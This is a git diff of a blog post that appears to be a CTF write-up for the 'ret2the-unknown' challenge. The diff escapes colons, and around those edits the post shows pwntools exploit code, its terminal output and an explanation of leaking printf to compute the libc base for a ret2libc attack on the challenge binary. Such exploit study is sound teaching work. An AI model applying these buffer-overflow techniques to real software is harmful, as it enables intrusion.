SoumyaEXE/soumya.github.io/_posts/2021-07-31-Ret2TheUnknown.markdown

 p.interactive()
 {% endhighlight %}

 The code shown above first starts a local process for the binary.
-Afterwards, the payload is sent and an interactive instance is called to the process:
+Afterwards, the payload is sent and an interactive instance is called to the process\:

 {% highlight bash %}
 ┌─[0xd4y@Writeup]─[~/business/ctf/redpwn/pwn/ret2the-unknown]
 └──╼ $python3 poc.py
-[+] Starting local process './ret2the-unknown': pid 5749
+[+] Starting local process './ret2the-unknown'\: pid 5749
 [*] Switching to interactive mode

 phew, good to know. shoot! i forgot!
-rob said i'd need this to get there: 7f3f6e089cf0
+rob said i'd need this to get there\: 7f3f6e089cf0
 good luck!that board meeting was a *smashing* success! rob loved the challenge!in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...where is this place? can you help me get there safely?$ test
 phew, good to know. shoot! i forgot!
-rob said i'd need this to get there: 7f3f6e089cf0
+rob said i'd need this to get there\: 7f3f6e089cf0
 good luck!
 [*] Got EOF while reading in interactive$ thanks!
 [*] Process './ret2the-unknown' stopped with exit code -11 (SIGSEGV) (pid 5749)
 [*] Got EOF while sending in interactive
-Traceback (most recent call last):
+Traceback (most recent call last)\:
  File "/usr/local/lib/python3.9/dist-packages/pwnlib/tubes/process.py", line 787, in close
    fd.close()
-BrokenPipeError: [Errno 32] Broken pipe
+BrokenPipeError\: [Errno 32] Broken pipe
 {% endhighlight %}

 The main function was successfully called again.
 Now the printf function address can be retrieved to find the base libc address for the second wave of the exploit.

 #### Finding Base Libc Address

-With the knowledge of where the printf function is in memory, the base address of libc can be calculated, and therefore the address of system() and location of the /bin/sh string can be determined by adding their offsets to the base libc address:
+With the knowledge of where the printf function is in memory, the base address of libc can be calculated, and therefore the address of system() and location of the /bin/sh string can be determined by adding their offsets to the base libc address\:

 {% highlight python %}
 from pwn import *

 REMOTE = False

-if REMOTE:
+if REMOTE\:
    p = remote("mc.ax",31568)
-else:   p = process("./ret2the-unknown")
+else\:   p = process("./ret2the-unknown")

 rip_offset = 40
 main = 0x0000000000401186